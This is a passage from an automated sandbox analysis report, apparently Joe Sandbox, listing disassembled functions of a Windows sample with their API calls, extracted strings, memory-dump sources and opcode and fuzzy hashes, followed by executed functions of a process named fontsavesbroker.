                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: File$Attributes$H_prologTime
                • String ID: :
                • API String ID: 1861295151-336475711
                • Opcode ID: 03e869ec4505b51a47f80b345db0f1ee0b9f0b4855ec1b0a32e1ee6cd66a1df0
                • Instruction ID: 73dca67bb9a065555e216d6763cc3830c7fc137855b78d229206d67ee07c52af
                • Opcode Fuzzy Hash: 03e869ec4505b51a47f80b345db0f1ee0b9f0b4855ec1b0a32e1ee6cd66a1df0
                • Instruction Fuzzy Hash: 46416671805158AADB20EB51DD65EEEB37CAF45304F0040DFB505A2292EB785F84DF69
                Function 004DB66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID: UNC$\\?\
                • API String ID: 0-253988292
                • Opcode ID: 548f763f98f634609537fecbee3ab2a5bfd09a43d66772d03054232cffa30c83
                • Instruction ID: a47d868e96084c19a6643f6ecdada64c9dcd41e4fdb4aeac8c315ca5af8f7c95
                • Opcode Fuzzy Hash: 548f763f98f634609537fecbee3ab2a5bfd09a43d66772d03054232cffa30c83
                • Instruction Fuzzy Hash: 7E419235500259EBCB20AF22CC61EEF77ADEF44754B11406BF85593352D778DA44C6E8
                Function 004E4230 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                Download Yara Rule
                APIs
                • __CxxThrowException@8.LIBVCRUNTIME ref: 004E43D8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Exception@8Throw
                • String ID: HCP$XCP
                • API String ID: 2005118841-2794936634
                • Opcode ID: 2563001fe78b62101447682ede9ff5f3414394e7169e68c2f44518f24c9beaf7
                • Instruction ID: b953dde3c532a3c668f01b753a52461a757a38469d7abf30211902c4cd8cb815
                • Opcode Fuzzy Hash: 2563001fe78b62101447682ede9ff5f3414394e7169e68c2f44518f24c9beaf7
                • Instruction Fuzzy Hash: 14416B706007408FD314DF2AC891BAAB7E5FF98304F05492EE99AC7351EB7AE818CB55
                Function 004E8FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID: Shell.Explorer$about:blank
                • API String ID: 0-874089819
                • Opcode ID: ad721b980c88cf2076350d6dc92cf78a561f62a9c64d18c069afa6207b546a7a
                • Instruction ID: aecc98e902253c8a830e62bdaceea376c847d174b3f28c9cf51d4d3dbc1a4613
                • Opcode Fuzzy Hash: ad721b980c88cf2076350d6dc92cf78a561f62a9c64d18c069afa6207b546a7a
                • Instruction Fuzzy Hash: 4D2185716143849FCB149F66C895A2B77A8FF84712B14856EF9098B2C2DB74EC01CB64
                Function 004ED44D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                Download Yara Rule
                APIs
                • DialogBoxParamW.USER32(GETPASSWORD1,00010418,004EA990,?,?), ref: 004ED4C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: DialogParam
                • String ID: GETPASSWORD1$xjR
                • API String ID: 665744214-3697140082
                • Opcode ID: 3fe5f145b82d3da4d30ec52ad6b651cb75ef7edc96cafe91e1c73eb9eaa4ec59
                • Instruction ID: 8d0db1c01a460b78b2d19a1e05e52d050e6d2c160b1404207266242e2e8380b3
                • Opcode Fuzzy Hash: 3fe5f145b82d3da4d30ec52ad6b651cb75ef7edc96cafe91e1c73eb9eaa4ec59
                • Instruction Fuzzy Hash: FC117B71604284ABEB21DF369C05BEB3BD8B719356F048066BD45A72C1CBF8AC489768
                Function 004DEBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004DEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004DEB92
                  • Part of subcall function 004DEB73: GetProcAddress.KERNEL32(005181C0,CryptUnprotectMemory), ref: 004DEBA2
                • GetCurrentProcessId.KERNEL32(?,?,?,004DEBEC), ref: 004DEC84
                Strings
                • CryptUnprotectMemory failed, xrefs: 004DEC7C
                • CryptProtectMemory failed, xrefs: 004DEC3B
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AddressProc$CurrentProcess
                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                • API String ID: 2190909847-396321323
                • Opcode ID: f1af7b6fb584813472108adb092c421421a51eed17a3429056941d5c44474bc9
                • Instruction ID: 91c28e5bdb0b7156ddd554092840554199e5ae6a7f87bae8a75d5c0a2849731c
                • Opcode Fuzzy Hash: f1af7b6fb584813472108adb092c421421a51eed17a3429056941d5c44474bc9
                • Instruction Fuzzy Hash: 0D115C32A102146BDB257F36DC166AF3B58AF05B24B04801BFC055F381CB796D4197D8
                Function 004F9B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free
                • String ID: XP
                • API String ID: 269201875-3026131541
                • Opcode ID: 2a013ee70dd1ac215541dc78347cff4d53a5d3f4f23970067c42eed3ca967571
                • Instruction ID: 6399a05cc1c9200973678d356414a4a56548446f4d2ee05c52d24e450a4f8fe4
                • Opcode Fuzzy Hash: 2a013ee70dd1ac215541dc78347cff4d53a5d3f4f23970067c42eed3ca967571
                • Instruction Fuzzy Hash: D411D375A007155BEB209B3ABC41B373694B760334F14062BFA21CA3D0EB78DC46568D
                Function 004EEC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004EF25E
                • ___raise_securityfailure.LIBCMT ref: 004EF345
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FeaturePresentProcessor___raise_securityfailure
                • String ID: 8S
                • API String ID: 3761405300-2465534777
                • Opcode ID: acaffd64fdbc4179210327105af67f8f12698bc9d22d15f374ae37643849ee74
                • Instruction ID: 37b9a366b1849e4b5afd467912a7d713347a6ff465afd8e897dab813e10c1d9c
                • Opcode Fuzzy Hash: acaffd64fdbc4179210327105af67f8f12698bc9d22d15f374ae37643849ee74
                • Instruction Fuzzy Hash: 1A2137B56103048BD754DF55F9A26043BE8FB68310F20686AE9088B7E0E3B16998FF45
                Function 004E0889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNEL32(00000000,00010000,004E09D0,?,00000000,00000000), ref: 004E08AD
                • SetThreadPriority.KERNEL32(?,00000000), ref: 004E08F4
                  • Part of subcall function 004D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D6EAF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Thread$CreatePriority__vswprintf_c_l
                • String ID: CreateThread failed
                • API String ID: 2655393344-3849766595
                • Opcode ID: ab7a04228194203ba976cd6b2f7ccf46c371949291fb523b2de99b8bde471228
                • Instruction ID: bbbb336207e3171c61202522305f1908dada63b62af7a85b8f722efeb0d98f01
                • Opcode Fuzzy Hash: ab7a04228194203ba976cd6b2f7ccf46c371949291fb523b2de99b8bde471228
                • Instruction Fuzzy Hash: 550126B53403056FE3206F51EC82BA67798FB40716F20002FF686922C1CBE4A8C19668
                Function 004FB2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 004F8FA5: GetLastError.KERNEL32(?,00510EE8,004F3E14,00510EE8,?,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F8FA9
                  • Part of subcall function 004F8FA5: _free.LIBCMT ref: 004F8FDC
                  • Part of subcall function 004F8FA5: SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F901D
                  • Part of subcall function 004F8FA5: _abort.LIBCMT ref: 004F9023
                • _abort.LIBCMT ref: 004FB2E0
                • _free.LIBCMT ref: 004FB314
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLast_abort_free
                • String ID: P
                • API String ID: 289325740-2113778011
                • Opcode ID: 00d490542eee046076e09ea0d717526d3f7ffb8259d5a399dcb7f754c0268778
                • Instruction ID: 4e73639fe2587f37014f38e3eaaa557a9de90b92392439ef8bc2f87051d7d878
                • Opcode Fuzzy Hash: 00d490542eee046076e09ea0d717526d3f7ffb8259d5a399dcb7f754c0268778
                • Instruction Fuzzy Hash: 47018872D4162ADBC7219F5AD80267EB760FF15721B19050FEE246B781CB386D418FCA
                Function 004D130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004DDA98: _swprintf.LIBCMT ref: 004DDABE
                  • Part of subcall function 004DDA98: _strlen.LIBCMT ref: 004DDADF
                  • Part of subcall function 004DDA98: SetDlgItemTextW.USER32(?,0050E154,?), ref: 004DDB3F
                  • Part of subcall function 004DDA98: GetWindowRect.USER32(?,?), ref: 004DDB79
                  • Part of subcall function 004DDA98: GetClientRect.USER32(?,?), ref: 004DDB85
                • GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                • SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                • String ID: 0
                • API String ID: 2622349952-4108050209
                • Opcode ID: 4c7155ea1c6cd3c9980feb6434f4a573b188e5846044f2b721fb9da9d68541fd
                • Instruction ID: 9d2c4ea2638e05a80b89b4eb8300a5c2361743e8be9e538c0f5a4fe1c87a645d
                • Opcode Fuzzy Hash: 4c7155ea1c6cd3c9980feb6434f4a573b188e5846044f2b721fb9da9d68541fd
                • Instruction Fuzzy Hash: 4BF08C3010028CB6EF250F628D29BEA3F98BB21305F08801BFD49547B1C77CC995EA14
                Function 004E084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,004E0A78,?), ref: 004E0854
                • GetLastError.KERNEL32(?), ref: 004E0860
                  • Part of subcall function 004D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D6EAF
                Strings
                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 004E0869
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                • API String ID: 1091760877-2248577382
                • Opcode ID: 8caa0e6cc55c426b79ff3238a7821c58be3ac3f1b2db55da5e875707683741c7
                • Instruction ID: 97886f65ca2725cc58f31b6d2734eb2a4da0973b6090e15a038255be37035442
                • Opcode Fuzzy Hash: 8caa0e6cc55c426b79ff3238a7821c58be3ac3f1b2db55da5e875707683741c7
                • Instruction Fuzzy Hash: 8ED02E31A0802122CB103B25AC1EEAF3E09AF62330F20031BF238A52F0DB24098192E9
                Function 004DDA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,004DD32F,?), ref: 004DDA53
                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,004DD32F,?), ref: 004DDA61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FindHandleModuleResource
                • String ID: RTL
                • API String ID: 3537982541-834975271
                • Opcode ID: df453194da63a95a0bb705042f99440f96484608d583710401e1fc2fd5652e27
                • Instruction ID: 1a9e2a6e82f0ad372bd914f90c9027fc1c57b31e51ee4c2070bdfdc770265df4
                • Opcode Fuzzy Hash: df453194da63a95a0bb705042f99440f96484608d583710401e1fc2fd5652e27
                • Instruction Fuzzy Hash: 45C0123168675076D73017216C1DB4B2E4C6B20F11F05044DB181DA2D0D5E5C9488650

                Executed Functions

                Function 00007FFD9B78E692 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: ;$Z$}
                • API String ID: 0-2180252066
                • Opcode ID: de3c1ca27dc7318b0ed8320a6093bb4c9350d50a8a6ee634405aeef309d6e614
                • Instruction ID: 14b83f257f1587094140cb8888e9868bc298c97ab6dbcc52a36e662a8d2cf148
                • Opcode Fuzzy Hash: de3c1ca27dc7318b0ed8320a6093bb4c9350d50a8a6ee634405aeef309d6e614
                • Instruction Fuzzy Hash: 5651A570E0962D8FDBA9DF54C8A07E9B7B1BF54301F1046EAD00DA62A1CB346B81CF40
                Function 00007FFD9B790270 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: Q$R
                • API String ID: 0-3870444779
                • Opcode ID: 01e0885cc63bf9ff191c48895b9e9ff0f054e22490461f857c303223ccb2aae3
                • Instruction ID: a44e80c6df6f2ee6ef4c6d923118759ee15823d245a10f0663e8a8705bf24fdd
                • Opcode Fuzzy Hash: 01e0885cc63bf9ff191c48895b9e9ff0f054e22490461f857c303223ccb2aae3
                • Instruction Fuzzy Hash: 5C31C870E09B6D8FDBA8DF44D8A47ADB7B1EF54302F1045AAD00DE62A1CB345A81DF40
                Function 00007FFD9B7816A8 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: UAVW
                • API String ID: 0-3038902782
                • Opcode ID: 936950452c2ee8172b7861a8f0df3be34d5940d88a6ef245b43a2de98891f5c7
                • Instruction ID: 7f33a4bdd5fa05d1017daca2486dbb008da4106fbe8cecb9178a5a5039a65b57
                • Opcode Fuzzy Hash: 936950452c2ee8172b7861a8f0df3be34d5940d88a6ef245b43a2de98891f5c7
                • Instruction Fuzzy Hash: 1981BE31B0DF494FDB59DE5C88A16A977E2EF98301B15067EE45EC32A2DE34A9028781
                Function 00007FFD9B781C7D Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: UAVW
                • API String ID: 0-3038902782
                • Opcode ID: 9788fc4f12b6a6153f8fb75c4d51095830cd95d576a3dd673e6e968e69c586a3
                • Instruction ID: dd57e33121059b74bf564adb196707601093a4c39fcfff9eec88c30b9ee3a1c4
                • Opcode Fuzzy Hash: 9788fc4f12b6a6153f8fb75c4d51095830cd95d576a3dd673e6e968e69c586a3
                • Instruction Fuzzy Hash: 35510630B18B894FDB5CDE1888A16B977E2FF98301F15467ED45EC72A1CE34A802C781
                Function 00007FFD9B782095 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: WVSH
                • API String ID: 0-4131290416
                • Opcode ID: 73bb92a10faa7556fd473ad8c8650f639d400aba4bf033e397f6865e62909a73
                • Instruction ID: a5c895c11a035445da29726b3c6039fe037a791a61b83611471e8359d87982a9
                • Opcode Fuzzy Hash: 73bb92a10faa7556fd473ad8c8650f639d400aba4bf033e397f6865e62909a73
                • Instruction Fuzzy Hash: F4415831F0EA4A4FD396DBB884A55B877E0EF85302F0642BAD40CC31B6DE38A9028341
                Function 00007FFD9B78EEFC Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: h
                • API String ID: 0-2439710439
                • Opcode ID: 0ff60126b0919c7e739992845190d7d5b4dd4f3b18ba2aec3dc07088d1767424
                • Instruction ID: 2eb535e130a895da4dd2a65531d75d8b94fbe1b4a509948aa77d27cc4195b3b6
                • Opcode Fuzzy Hash: 0ff60126b0919c7e739992845190d7d5b4dd4f3b18ba2aec3dc07088d1767424
                • Instruction Fuzzy Hash: 36414930E09A5D8FDBA8DF188C957A9B7A1EF59302F1006E9D00DE62A1DE346E818F41
                Function 00007FFD9B78DA29 Relevance: .4, Instructions: 430COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 838660fb6f09a2effa0bdcb96a4520a524694fa6b028b723786ba1ff75863cf0
                • Instruction ID: 515d3211434a163670f6ded3c04b7c8b8182f413be303ea8551bde2b97505826
                • Opcode Fuzzy Hash: 838660fb6f09a2effa0bdcb96a4520a524694fa6b028b723786ba1ff75863cf0
                • Instruction Fuzzy Hash: 7AF13C71E19A5D8FEB68EFA8C4A57B8B7A1FF58301F1401BED00DD32A6DA346940CB41
                Function 00007FFD9B780525 Relevance: .4, Instructions: 388COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5bbb1c7557a3c8233416042de89009a4fe415be26d13c9cdb34a4febc4362da2
                • Instruction ID: 1a2f7f78d3e6036ff0c3a7f86a3e4431b457c62d3b1ceeb8e121a0eb34fdf35e
